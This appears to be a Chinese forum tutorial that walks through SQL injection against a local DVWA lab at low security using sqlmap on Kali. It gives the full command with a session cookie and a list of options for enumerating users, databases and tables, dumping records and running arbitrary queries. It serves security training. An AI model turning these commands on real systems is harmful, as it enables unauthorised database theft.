IT评测·应用市场-qidao123.com
标题:
Sqlmap注入dvwa平台low级别
[打印本页]
作者:
立山
时间:
2022-8-31 05:44
标题:
Sqlmap注入dvwa平台low级别
工具介绍:sqlmap是一款开源的软件SQL注入攻击是黑客对数据库进行攻击的常用手段之一。随着B/S模式应用开发的发展,使用这种模式编写应用程序的程序员也越来越多。但是由于程序员的水平及经验也参差不齐,相当大一部分程序员在编写代码的时候,没有对用户输入数据的合法性进行判断,使应用程序存在安全隐患。用户可以提交一段数据库查询代码,根据程序返回的结果,获得某些他想得知的数据,这就是所谓的SQL Injection,即SQL注入。SQL注入攻击属于
数据库安全
攻击手段之一,可以通过
数据库安全
防护技术实现有效防护,数据库安全防护技术包括:数据库漏扫、
数据库加密
、
数据库防火墙
、
数据脱敏
、
数据库安全审计系统
。SQL注入攻击会导致的
数据库安全
风险包括:
刷库
、
拖库
、
撞库
。low级别注入:使用kali 自带的 sqlmap
搭建dvwa环境
把安全级别改为low级别
SQLInjection(注射:注入) user id 22
查看网站cookie 浏览器按F12 或者右键检查找到网络选项 英文network :
CTRL + R 刷新记录可以看见cookie:
复制到kali 使用sqlmap工具执行命令sqlmap -u "http://192.168.62.136/DVWA/vulnerabilities/sqli/?id=22&Submit=Submit#" --cookie 'PHPSESSID=o2md9cm1d24jbrpbdj1ra02os8; security=low' --current-user ##-u 接网站URL --cookie使用cookie认证 --current-user # 查询当前数据库用户
注入成功
查看基本信息
1. --users # 查询所有的数据库账号
2. --dbs # 查询所有数据库
3. --schema # 查询源数据库(包含定义数据的数据)
4. -a # 查询当前user、当前数据库、主机名、当前user是否是最大权限管理员、数据库账号等
5. -D dvwa# 指定数据库
6. --current-user # 查询当前数据库用户
7. --current-db # 查询当前数据库
8. --hostname # 查看服务器的主机名
9. --Privileges -U username # 查询username的权限
10. --roles 角色
11. --tables # 查看所有的表
12. -T # 指定表
13. --columns # 查看所有的字段
14. -C # 指定字段
15. --count # 计数,查看有多少条数据
16. --exclude-sysdbs # 排除系统库
17. --dump # 查看数据
18. --start 3 # 查看第三条
19. --end 4 # 查看第四条
20. --sql-query "select * from users" # 执行语句
21. --common-columns # 暴力破解字段,应用于两种情况:①无权限读取数据。②mysql
欢迎光临 IT评测·应用市场-qidao123.com (https://dis.qidao123.com/)
Powered by Discuz! X3.4